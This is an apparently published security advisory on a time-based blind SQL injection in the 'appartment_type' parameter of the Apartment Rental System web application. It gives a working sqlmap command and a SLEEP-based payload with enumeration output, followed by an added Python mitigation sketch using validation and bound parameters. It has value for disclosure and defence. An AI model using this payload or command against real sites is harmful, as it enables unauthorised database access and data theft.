Apartment Rental System - Time-Based Blind SQL Injection

2017.05.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#############################################################
# Application Name : Apartment Rental System (Nightly)
# Vulnerable Type : Time-Based Blind SQL Injection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site: http://envato.bestsoftinc.net/apartment-rental-nightly/
# Author: Siber Güvenlik Akademisi - Pentester
# Date: 08.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'appartment_type' (POST)
# SQLi: http://localhost/apartment-rental-nightly/search-result.php
# Proof of concept:

sqlmap -u "http://localhost/apartment-rental-nightly/search-result.php" --data="appartment_type=2&check_in=05%2F12%2F2017&check_out=06%2F27%2F2017&maxbed=2&maxbath=2&sorting=asc&submit=SEARCH" --random-agent --threads=5 --dbs

Parameter: appartment_type (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: appartment_type=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FmWg)&check_in=06/04/2017&check_out=06/24/2017&maxbed=2&maxbath=1&sorting=desc&submit=SEARCH
---
[15:58:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.12

References:

https://www.youtube.com/channel/UCjZcTUoYCR5nLj8G1riUvLw/featured
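
Mitigation sketch (an added example, not code from the advisory or from the vendor): the search form's fields are validated to their expected types and the numeric values are bound as query parameters, so the payload above is rejected before it reaches the database. The product itself is PHP/MySQL; this uses Python with an in-memory SQLite database to stay self-contained, and the table, column names and matching rules are assumptions.

```python
import re
import sqlite3
from datetime import datetime

# Field names come from the POST body in the advisory; the validation
# rules and the schema below are assumptions made for this example.
INT_FIELD = re.compile(r"[0-9]{1,6}")
SORT_SQL = {"asc": "ASC", "desc": "DESC"}  # ORDER BY direction cannot be bound


def parse_search(form):
    """Return typed values or raise ValueError; raw strings never reach SQL."""
    out = {}
    for name in ("appartment_type", "maxbed", "maxbath"):
        value = form.get(name, "")
        if not INT_FIELD.fullmatch(value):
            raise ValueError(f"{name}: expected an unsigned integer")
        out[name] = int(value)
    for name in ("check_in", "check_out"):
        # strptime raises ValueError on anything that is not MM/DD/YYYY
        out[name] = datetime.strptime(form.get(name, ""), "%m/%d/%Y").date()
    if out["check_out"] <= out["check_in"]:
        raise ValueError("check_out must be after check_in")
    sorting = form.get("sorting", "")
    if sorting not in SORT_SQL:
        raise ValueError("sorting: expected asc or desc")
    out["sorting"] = SORT_SQL[sorting]  # allow-listed keyword, not user text
    return out


def search(conn, form):
    """Run the search with bound parameters (hypothetical query shape)."""
    q = parse_search(form)
    sql = ("SELECT name FROM apartments WHERE type_id = ? AND beds >= ? "
           "AND baths >= ? ORDER BY price " + q["sorting"])
    args = (q["appartment_type"], q["maxbed"], q["maxbath"])
    return [row[0] for row in conn.execute(sql, args)]


def demo_db():
    """Constructed sample data, not the product's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE apartments "
                 "(name TEXT, type_id INT, beds INT, baths INT, price INT)")
    conn.executemany("INSERT INTO apartments VALUES (?,?,?,?,?)",
                     [("Loft", 2, 2, 2, 90), ("Studio", 1, 1, 1, 50),
                      ("Suite", 2, 3, 2, 140)])
    return conn
```

The sorting field is mapped through an allow-list because an ORDER BY direction cannot be passed as a bound parameter.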

